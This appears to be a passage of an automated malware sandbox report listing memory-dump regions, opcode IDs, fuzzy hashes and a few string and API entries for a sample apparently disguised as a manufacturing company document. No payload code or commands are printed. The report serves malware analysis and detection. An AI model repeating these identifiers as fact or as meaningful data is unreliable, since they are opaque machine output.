2381->2342 2383->2311 2385 10a65d8-10a65ea 2383->2385 2385->2381
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,q$,q
                                          • API String ID: 0-1667412543
                                          • Opcode ID: 2f78472f0abe09ee28feccebef1b40b524a7761b1b63cd58e15ebcf3da60362e
                                          • Instruction ID: 7252a50211ff999eeea9e3e360802628119faade2cba6c810685398b397564f8
                                          • Opcode Fuzzy Hash: 2f78472f0abe09ee28feccebef1b40b524a7761b1b63cd58e15ebcf3da60362e
                                          • Instruction Fuzzy Hash: 7981AF34A00505CFDB58CFBDC484AADBBF2BF89200B9D81A9D586DB365DB32E841CB50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Xq$Xq
                                          • API String ID: 0-1556399337
                                          • Opcode ID: 1960941b3f05742bcd1259f3eb2bcacaf59d764973ddd3d7f63a3c4d5dadb759
                                          • Instruction ID: 38bc1fb2b1834cb8738ed61c0a5a82c96ab9b0ee6e440edee625af44f9c1e1bd
                                          • Opcode Fuzzy Hash: 1960941b3f05742bcd1259f3eb2bcacaf59d764973ddd3d7f63a3c4d5dadb759
                                          • Instruction Fuzzy Hash: 1C31C831704325CBEF6866E9689537E65E6BBC4200F984439D897CB384DBB5CC4447D1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $q$$q
                                          • API String ID: 0-3126353813
                                          • Opcode ID: 51258c5d8e8bf2cedf2bf7908d8c23f98313321b524457e28219719f9ee459b4
                                          • Instruction ID: 2989d133aead2798e4318fe10f3cd15f5cd6b9091ba1bd19b55cd99e555eda27
                                          • Opcode Fuzzy Hash: 51258c5d8e8bf2cedf2bf7908d8c23f98313321b524457e28219719f9ee459b4
                                          • Instruction Fuzzy Hash: 0F31D8303042538FD7364BBDCC5467E7BAAAF8530279484ABF2C2CB296DA29CC408755
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'q$4'q
                                          • API String ID: 0-1467158625
                                          • Opcode ID: ad51bfe8183acbd94744d8f381672febd960b609b6457c1000ff787fc1468725
                                          • Instruction ID: 6a13dfbc3b4ba7bde6ba7fdaf264bf4b09fe1a8f908a6686dbaaea2aa2f263be
                                          • Opcode Fuzzy Hash: ad51bfe8183acbd94744d8f381672febd960b609b6457c1000ff787fc1468725
                                          • Instruction Fuzzy Hash: 9FF06D753002156FD7192BE598506BB7BDBEFDC350B548439BA49C7350ED71CC518790
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LRq
                                          • API String ID: 0-3187445251
                                          • Opcode ID: 34333d8f679a7929293aa10b93d1e12b232904565c5aaf83b9edf09865e74543
                                          • Instruction ID: 4c259a127edc91943b712a4650c888644546c2e0c01f6ed94a58fc4aa2b31f35
                                          • Opcode Fuzzy Hash: 34333d8f679a7929293aa10b93d1e12b232904565c5aaf83b9edf09865e74543
                                          • Instruction Fuzzy Hash: 7452F975E00219CFCB64EF64E994B9DBBB2FB88301F1085A9D45AA7358DB706D81CF60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LRq
                                          • API String ID: 0-3187445251
                                          • Opcode ID: 8a3acce90f6c7ca457f5a0474ceca8aff82e391110da962419e873c87a7a7bf2
                                          • Instruction ID: 4457531362dfe85810d8e289fd6455c01ec3a7360621979ae74c4964c506ee84
                                          • Opcode Fuzzy Hash: 8a3acce90f6c7ca457f5a0474ceca8aff82e391110da962419e873c87a7a7bf2
                                          • Instruction Fuzzy Hash: 0A52D975E00219CFCB64EF64E994B9DB7B2FB88301F1085A9D45AA7358DB705D81CF60
                                          APIs
                                          • LdrInitializeThunk.NTDLL(00000000), ref: 06929A6E
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d76d41713beef0ef5dbab12d201399f2d194c8a34e9f8614b7d548ca4ee2e443
                                          • Instruction ID: b46ac31ddd028f0efb8c29a097fcdf1152e0aa5e8c1f7c2ff269afe1bc309522
                                          • Opcode Fuzzy Hash: d76d41713beef0ef5dbab12d201399f2d194c8a34e9f8614b7d548ca4ee2e443
                                          • Instruction Fuzzy Hash: DA114F74E0021A8FEB44DFE9D884AEDB7F9FF88314F548155E844A7649D7349D41CB50
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e29f63cfa32d6e85cff1136c59c4e8427019ec6d43f5c6846cc885cc6126aac7
                                          • Instruction ID: ed800abd33019989293b1074601c87324a85352fd2dce5016c99cb7b06d65f18
                                          • Opcode Fuzzy Hash: e29f63cfa32d6e85cff1136c59c4e8427019ec6d43f5c6846cc885cc6126aac7
                                          • Instruction Fuzzy Hash: FD1296340212878FE3602B64E6AC16BBF66FB5F363314AD11B58FC1059DB7E14899F26
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b83d79553f515ef702e5dba6285d4bcda27556798543da0fcccb6c735896a824
                                          • Instruction ID: ff6027f6ee1600621b3c7eef155851709450ccd4c99b9e995ed2f39dc18e2b95
                                          • Opcode Fuzzy Hash: b83d79553f515ef702e5dba6285d4bcda27556798543da0fcccb6c735896a824
                                          • Instruction Fuzzy Hash: 181285340212878FA3602B64E6AC16BBE66FB5F363314AD11B58FC1059DB7E14899F26
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3968aec1ba9e5309c494738dd97561dff6ccb235e6818469d11561ec71c8ef34
                                          • Instruction ID: 0bb584ffaf3af1c402dcc0a59f3356704d1d12b75e1c94796c82c816c2ddbef8
                                          • Opcode Fuzzy Hash: 3968aec1ba9e5309c494738dd97561dff6ccb235e6818469d11561ec71c8ef34
                                          • Instruction Fuzzy Hash: B1716B343006058FDB65DFACC888ABE7BE5AF49242F5580AAE986CB371DB75DC41CB50
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 256e961a20e7233221335536cd147d7bb48ad923c23d4d40b7fab8203bbd7f40
                                          • Instruction ID: d1744361f79d4e3f1d6eb56df2a6cb221a96adc16fc14f2f6e0ba858002407ca
                                          • Opcode Fuzzy Hash: 256e961a20e7233221335536cd147d7bb48ad923c23d4d40b7fab8203bbd7f40
                                          • Instruction Fuzzy Hash: 42611070D01319DFDB14DFA4D888BADBBB2BF89300F608129D845AB294DB755986CF40
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d2a1b53d72ca8df4ec6a303465ed2c6caea8f2ed5df9ce50624e9ea5820b43b7
                                          • Instruction ID: 52aa8cb8cb4cf728a03fd77afa2a8750972c9dda38024e576828c8397b40b860
                                          • Opcode Fuzzy Hash: d2a1b53d72ca8df4ec6a303465ed2c6caea8f2ed5df9ce50624e9ea5820b43b7
                                          • Instruction Fuzzy Hash: 4551A374E01218DFDB48DFA9D984ADDBBF2BF89300F249169E819AB364DB309901CF50
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c64a5f202ea70665ab0573adaff11e947fd3892ed51d11e988184b403b245fb3
                                          • Instruction ID: 288bec343958ba747f2e0850226718df99ad74309cae202b3b0a30e56cc6e2b6
                                          • Opcode Fuzzy Hash: c64a5f202ea70665ab0573adaff11e947fd3892ed51d11e988184b403b245fb3
                                          • Instruction Fuzzy Hash: 13519175E01308CFCB48DFA9D59499DBBF2FF89300B609469E815AB368DB35A842CF50
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 925b84b5f704444b07d50337b5c497ada999395e7b75a8d58524deb9ad95f3a6
                                          • Instruction ID: 5815eff5796e612989dd76be1b07338faf067948ba2dc35d02ebdf7d8906e66a
                                          • Opcode Fuzzy Hash: 925b84b5f704444b07d50337b5c497ada999395e7b75a8d58524deb9ad95f3a6
                                          • Instruction Fuzzy Hash: EB41C131B00249DFCF12CFA8C844A9EBFF2AF89350F448195F9859B292D775D814CB50
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4e4ce98cb1185d1d32ba71d4abc647aff851be78a6fab881b775a097297cc41e
                                          • Instruction ID: a8029d9f3493d73444725d05ac60c6fb755a0570beb2ccd432c3d5beb002e43e
                                          • Opcode Fuzzy Hash: 4e4ce98cb1185d1d32ba71d4abc647aff851be78a6fab881b775a097297cc41e
                                          • Instruction Fuzzy Hash: 8E4172307002558FDB41DF58C844B6A7BF6EF49318F8484A6E958CF256D775DC41CBA2
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 46c842204b9fbd2b0a4a73839ae784b0dc25f6a4da1c8daa425627b65d433e73
                                          • Instruction ID: 4a8ab6500f034860d028d640e35f937b8b5ca132a73c25057647cd53a589ab94
                                          • Opcode Fuzzy Hash: 46c842204b9fbd2b0a4a73839ae784b0dc25f6a4da1c8daa425627b65d433e73
                                          • Instruction Fuzzy Hash: 9231C571300119DFCF159FA8E895AAE7FA2FB88340F004029F9959B354CB39D961DFA0
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 634ad7a9c287bdb0ffe17b9ceff54aac7ba096e161e53f758f4dfac7999aa67b
                                          • Instruction ID: 29b723ab2ae03f0e2fec6c610792662e57c4efb64cd45fcac41991b38e209680
                                          • Opcode Fuzzy Hash: 634ad7a9c287bdb0ffe17b9ceff54aac7ba096e161e53f758f4dfac7999aa67b
                                          • Instruction Fuzzy Hash: 8E21B0303046108BEB2557ADC45473E3696AFC474AF98C07ED582CB799EE7ACC429781
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0751b41ce928b312a3cd8733d049316aca365671497888466af8f4a1cacfac92
                                          • Instruction ID: e07bc50e66fef72199be1f61919de56dc2d4ff542fa9e65e48f97a022f29f4ce
                                          • Opcode Fuzzy Hash: 0751b41ce928b312a3cd8733d049316aca365671497888466af8f4a1cacfac92
                                          • Instruction Fuzzy Hash: 16313474D052498FCB41DFB8D9442EEBFF1EF4A300F0441AAD485B7224EB351A85CBA2
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 06eb92829e056ffa7ddecd5c66d289b4b2d43adbbda4c63ace5160f0931ea2e8
                                          • Instruction ID: 6991aa5e52b831fa916be7efbbd06b4ae269ef5c35fec1647d94381340a78f22
                                          • Opcode Fuzzy Hash: 06eb92829e056ffa7ddecd5c66d289b4b2d43adbbda4c63ace5160f0931ea2e8
                                          • Instruction Fuzzy Hash: 8721AF35A00204AFCB55DFA8C440AAE3BA5EB9D7A0B50C579D85A9B344DB30EE46CBD1
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ddf857050a68e35deedb7687d73fb4ba25152548873d2f0563af3ec0ca906b6e
                                          • Instruction ID: 39eab999dbed9cadcfa1de781a6948bfad895f76e9899c5bee958e819459049a
                                          • Opcode Fuzzy Hash: ddf857050a68e35deedb7687d73fb4ba25152548873d2f0563af3ec0ca906b6e
                                          • Instruction Fuzzy Hash: 8921F3363006218FC7259B6DC49492EB7A2FFC97517488079E986CB398CF32DC028B80
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3734653959.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_105d000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 031e632488d780f198f49f42583065f680665c5bdcdbf9d6276443330082249f
                                          • Instruction ID: fb0387f122dc8f3d7ae2ba4d3d7649da4c0c43e5193b09bd9d4fc15f71bf36de
                                          • Opcode Fuzzy Hash: 031e632488d780f198f49f42583065f680665c5bdcdbf9d6276443330082249f
                                          • Instruction Fuzzy Hash: 2F212571504204EFDB95DF94C8C0B27BBA5FB84314F24C5AEED890B242C736D846CB62
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1f63bd7e8dd2f42661cd91bf38e00836f52b1f261c5a2a811967786903bca30c
                                          • Instruction ID: d67d4e1e1645e2d8a38496b9f88a56a27c52337d191d4c1e75ebe82335648183
                                          • Opcode Fuzzy Hash: 1f63bd7e8dd2f42661cd91bf38e00836f52b1f261c5a2a811967786903bca30c
                                          • Instruction Fuzzy Hash: E82123716041599FCB159FA8E8956AE3FA1FB89310F004069F8C58B359CB38DD51CFA0
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ea9281d414423ab5f40e54b0130ffdc69ae08fb7726b481ed86f65177ec0056c
                                          • Instruction ID: 568cdd147a5551c056ed7bb595d2e9b161604b3368d1b7b420d16cb8db53ab1e
                                          • Opcode Fuzzy Hash: ea9281d414423ab5f40e54b0130ffdc69ae08fb7726b481ed86f65177ec0056c
                                          • Instruction Fuzzy Hash: DD318379E01308CFCB44DFA8D59499DBBB2FF49301B608469E819AB368D731AD41CF50
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6f92320c400a67cd25f4b560486fe7966bfc4231a4333d99f7587025bd94044c
                                          • Instruction ID: bdc02b8587bdb1a6e4fa61990d24960f9459438c3088fb5630a64d2a545eb4ce
                                          • Opcode Fuzzy Hash: 6f92320c400a67cd25f4b560486fe7966bfc4231a4333d99f7587025bd94044c
                                          • Instruction Fuzzy Hash: BA21AD30E00248DFDB15CFE5D580AEEBFB6AF48208F148069E450A6394CB31E941CF60
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c889161fb3ba2a8c983a3697f0b93a97c416fa38926ca5e521d7daff6186f359
                                          • Instruction ID: 6ac971c9255c2772c18c443f2558138daf5cc4a6e594edf678cc7d83f1b31175
                                          • Opcode Fuzzy Hash: c889161fb3ba2a8c983a3697f0b93a97c416fa38926ca5e521d7daff6186f359
                                          • Instruction Fuzzy Hash: BA11C1363046119FD7158B6DD46452E7BB2BFC939130880A9E586CB364CF32DC028B90
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cce0ee01035df59da977c83fb1b655294d88ccb624195365c677a00625bdbd65
                                          • Instruction ID: b5b2fc3ff9046dd9e347c1777b3ef83feadc14748eb261a44d8961a9572cf971
                                          • Opcode Fuzzy Hash: cce0ee01035df59da977c83fb1b655294d88ccb624195365c677a00625bdbd65
                                          • Instruction Fuzzy Hash: 4E216DB0D0030A9FEB45EFA9D54078EBBF2FB45300F40C5AAC194AB368E7745A459F91
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c2373a2d4bf12eb1d168fe83e84cdbfee15674ad6057d756d4364b86e0d8f7a7
                                          • Instruction ID: b0f8c0007d2868429abc929a4ac7df0f83ecc3d644e4a090534948e278d71f42
                                          • Opcode Fuzzy Hash: c2373a2d4bf12eb1d168fe83e84cdbfee15674ad6057d756d4364b86e0d8f7a7
                                          • Instruction Fuzzy Hash: DC21E075C0524A8FCB40EFB8D9445EEBFF0AF0A300F1051AAD845B2224EB365A94CFA1
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b9839275bfddd52581bdb4846f0f53dfb8e881f0f2f49c6cafdf647d05ea67af
                                          • Instruction ID: db437ef8e6ebd6b4167da2ef2138bb7ef811327843b8250000763a321e18bcc6
                                          • Opcode Fuzzy Hash: b9839275bfddd52581bdb4846f0f53dfb8e881f0f2f49c6cafdf647d05ea67af
                                          • Instruction Fuzzy Hash: F2116AB0D0020A9FEB44EFA8D54078EBBF2FB84300F40C5A9C1949B328EB745A458F91
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3734653959.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_105d000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                          • Instruction ID: 2327a349e43b95f4b8a254a2e8185d73e75bf28c34dbb117639c01d50fe0dfd8
                                          • Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                          • Instruction Fuzzy Hash: 9911BB75504284DFDB52CF54C9C4B16BBA2FB84314F28C6AAEC894B656C33AD44ACF62
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9f545ca8b7ce70cc23ac71756aaf5f5cabc3618fb44a162d2f8ab0227659c4a1
                                          • Instruction ID: e033436dc717fb62eedbe78c86363a527d045d6305cb78b79e194086f14690c2
                                          • Opcode Fuzzy Hash: 9f545ca8b7ce70cc23ac71756aaf5f5cabc3618fb44a162d2f8ab0227659c4a1
                                          • Instruction Fuzzy Hash: E901F9316002156FC7268F94DC1199E3FA6FBC9790F488165F995CB284CE758D159B90
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f58cc93193dd670748be9fbe424f579815e79d41fa1b7f1afad0ecaab4cece73
                                          • Instruction ID: 36e51cac51d9701515364c1b7557655edf34f47252031fd943e5516f8456cec5
                                          • Opcode Fuzzy Hash: f58cc93193dd670748be9fbe424f579815e79d41fa1b7f1afad0ecaab4cece73
                                          • Instruction Fuzzy Hash: 13F09C31300614CFE7266A6ED85462EBADEEFC8E5539540B9E545CB3A6EE21CC03C790
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bc414fc331320c1079c5ad2f5103b37589dbbaef586646a4a7e30de0dac43ad9
                                          • Instruction ID: 45a2710b907cdc0681a515948e9f6749aa878fa04c79b9674f903f5e8bb93a97
                                          • Opcode Fuzzy Hash: bc414fc331320c1079c5ad2f5103b37589dbbaef586646a4a7e30de0dac43ad9
                                          • Instruction Fuzzy Hash: 2B112979D0430ADFDB41DFA8D8445AEBBB1FB89300F4081A6D920E3354D7755A59CFA1
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 98c8a5c7e60d26ba469cd47afa96dd4d7bfb2ae024232f52dc30c075fa88667e
                                          • Instruction ID: 83ff1ada2230ae220af97dde1d75baeba06e86ab712451a890a2644ff43c4207
                                          • Opcode Fuzzy Hash: 98c8a5c7e60d26ba469cd47afa96dd4d7bfb2ae024232f52dc30c075fa88667e
                                          • Instruction Fuzzy Hash: 42F09032A042589FDB419F68D808AEABFF5EF89324F0580A7E548CB251D3314955CB91
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 16a68d19ad486ee47c2e5c669278f283785330ed216188050545b2e18dfa1b7a
                                          • Instruction ID: ef3024ba2bdf2b979a4ad15e2a1145fc84e8aed5eb499986d14c2e616481ecd0
                                          • Opcode Fuzzy Hash: 16a68d19ad486ee47c2e5c669278f283785330ed216188050545b2e18dfa1b7a
                                          • Instruction Fuzzy Hash: 9FF03076644244EFCB11DF94EC40ADDBBB2FF8C321F184096EA11AB2A1C2319815CB60
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b57c37bda7ed3a79964666605ec613c546a86b42d57d614aa14a82324657712e
